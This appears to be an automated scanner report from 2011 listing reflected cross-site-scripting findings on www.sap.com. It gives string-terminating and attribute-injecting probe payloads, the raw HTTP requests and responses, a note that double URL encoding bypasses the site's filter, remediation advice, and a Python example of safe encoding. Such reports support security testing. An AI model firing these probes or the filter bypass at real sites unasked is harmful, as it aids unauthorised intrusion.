There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /business_management_software/inventory_management.epxa950b%2522a%253d%2522b%252216285773807 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34684
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:59 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:59 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload befcd%2522a%253d%2522b%2522a7ad0d78ceb was submitted in the REST URL parameter 2. This input was echoed as befcd"a="b"a7ad0d78ceb in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /communities/index.aspxbefcd%2522a%253d%2522b%2522a7ad0d78ceb HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 36090
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11235'%3bb3a98b94547 was submitted in the REST URL parameter 1. This input was echoed as 11235';b3a98b94547 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
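Added illustration of the script-context problem and of the two ways out of it: encode the value as a proper JavaScript string literal, or (as the remediation prefers) keep user data out of the script block altogether and let static script read it from the DOM. This is example code, not the report's or the application's; the template reproduces the `var DOCUMENTGROUP='...'` snippet visible in the response, the payload is the one the report submitted (shown once-decoded, as the application receives it), and the `data-group` attribute and `extract_literal` helper are assumptions for the demonstration.

```python
import html
import json

# The report's payload for the first REST URL segment, after the web server's URL-decode.
ONCE_DECODED = "contactsap11235';b3a98b94547"

PAGE_PREFIX = '<script language="Javascript"> var DOCUMENTGROUP='
PAGE_SUFFIX = "; var DOCUMENTNAME='Error';"


def vulnerable_script(document_group: str) -> str:
    """Template as the response shows it: the raw value dropped between single quotes."""
    return f"{PAGE_PREFIX}'{document_group}'{PAGE_SUFFIX}"


def js_string_literal(value: str) -> str:
    """Serialise VALUE as a JavaScript string literal that is safe inside an inline
    <script>. json.dumps escapes quotes, backslashes and control characters (and,
    with its default ensure_ascii, U+2028/U+2029); the extra replacements stop a
    </script> or entity-like text inside the value from reaching the HTML parser."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def hardened_script(document_group: str) -> str:
    """Option 1: still in script context, but through a real JS literal encoder."""
    return f"{PAGE_PREFIX}{js_string_literal(document_group)}{PAGE_SUFFIX}"


def data_attribute_page(document_group: str) -> str:
    """Option 2 (what the remediation text asks for): no user data inside the
    script at all. Attribute-encode it on a static element and read it from there."""
    return (f'<div id="doc" data-group="{html.escape(document_group, quote=True)}"></div>'
            '<script> var DOCUMENTGROUP=document.getElementById("doc").dataset.group;'
            " var DOCUMENTNAME='Error';</script>")


def extract_literal(script: str, var: str = "DOCUMENTGROUP") -> str:
    """Read the literal the way a JS parser would: from the quote after VAR= up to
    the first unescaped matching quote (escape sequences are kept raw). If this is
    shorter than the value the template meant to emit, the string was broken out of."""
    head = f"{var}="
    i = script.index(head) + len(head)
    quote = script[i]
    i += 1
    out = []
    while i < len(script) and script[i] != quote:
        if script[i] == "\\":
            out.append(script[i:i + 2])
            i += 2
        else:
            out.append(script[i])
            i += 1
    return "".join(out)


if __name__ == "__main__":
    v = vulnerable_script(ONCE_DECODED)
    print(v)
    print("parser sees literal:", repr(extract_literal(v)))   # only 'contactsap11235'
    h = hardened_script(ONCE_DECODED)
    print(h)
    print("parser sees literal:", repr(extract_literal(h)))   # the whole value, intact
    print(data_attribute_page(ONCE_DECODED))
```

`extract_literal` is the check worth running on any page that embeds request data in script: whatever value the template intended, the browser only believes the string up to the first unescaped quote, and everything after it is executed as code. Note that the report's payload ends with a lone `'` that would make the rest of the statement a syntax error; a real attack would close it properly, which is why the scanner reports a string termination rather than a working proof of concept.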
Request
GET /contactsap11235'%3bb3a98b94547/directory/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34137
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:06 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:06 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='contactsap11235';b3a98b94547'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1715c'%3b2afb3a939ff was submitted in the REST URL parameter 1. This input was echoed as 1715c';2afb3a939ff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporate-en1715c'%3b2afb3a939ff/our-company/legal/copyright/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34311
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='corporate-en1715c';2afb3a939ff'; var DOCUMENTNAME='Error';
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c7db'%3b1b431263886 was submitted in the REST URL parameter 2. This input was echoed as 4c7db';1b431263886 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /corporate-en/our-company4c7db'%3b1b431263886/legal/copyright/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 26485
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:14 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=PC.LNGID=1&PC.LNG=English&PC.SUB=corporate-en; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='our-company4c7db';1b431263886'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfdc8'%3b7972640c05a was submitted in the REST URL parameter 1. This input was echoed as cfdc8';7972640c05a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /globalcfdc8'%3b7972640c05a/client_functions.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34196
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='globalcfdc8';7972640c05a'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a67'%3bfd99d1a36d0 was submitted in the REST URL parameter 1. This input was echoed as 17a67';fd99d1a36d0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global17a67'%3bfd99d1a36d0/css/Flyouts.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34150
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:02 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:02 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global17a67';fd99d1a36d0'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19826'%3b0257c2c66d3 was submitted in the REST URL parameter 1. This input was echoed as 19826';0257c2c66d3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global19826'%3b0257c2c66d3/css/MainContentPanel.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34245
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:59 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:59 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global19826';0257c2c66d3'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35eda'%3bedbf9da7bbb was submitted in the REST URL parameter 1. This input was echoed as 35eda';edbf9da7bbb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global35eda'%3bedbf9da7bbb/css/MainLeftPanel.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34208
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:59 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:59 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global35eda';edbf9da7bbb'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51e02'%3b12717624626 was submitted in the REST URL parameter 1. This input was echoed as 51e02';12717624626 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global51e02'%3b12717624626/css/MainRightPanel.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:02 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:02 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global51e02';12717624626'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8914c'%3b731e10a56e3 was submitted in the REST URL parameter 1. This input was echoed as 8914c';731e10a56e3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global8914c'%3b731e10a56e3/css/dropdownlist.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34201
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:01 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global8914c';731e10a56e3'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b6eb'%3bb5fb07c6ddc was submitted in the REST URL parameter 1. This input was echoed as 7b6eb';b5fb07c6ddc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global7b6eb'%3bb5fb07c6ddc/css/rm_css/rm_iframe_css.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34268
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:56 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global7b6eb';b5fb07c6ddc'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49fd6'%3bdd65a3fcd1e was submitted in the REST URL parameter 1. This input was echoed as 49fd6';dd65a3fcd1e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global49fd6'%3bdd65a3fcd1e/js/FormEngine.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34174
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:43 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:43 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global49fd6';dd65a3fcd1e'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21ae8'%3b7885f86171f was submitted in the REST URL parameter 1. This input was echoed as 21ae8';7885f86171f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global21ae8'%3b7885f86171f/js/addthis_widget.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:39 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:39 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global21ae8';7885f86171f'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 494b8'%3b3f9e794eca6 was submitted in the REST URL parameter 1. This input was echoed as 494b8';3f9e794eca6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f57fc'%3bc7151b9655c was submitted in the REST URL parameter 1. This input was echoed as f57fc';c7151b9655c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /globalf57fc'%3bc7151b9655c/js/dropdownlist.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34188
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
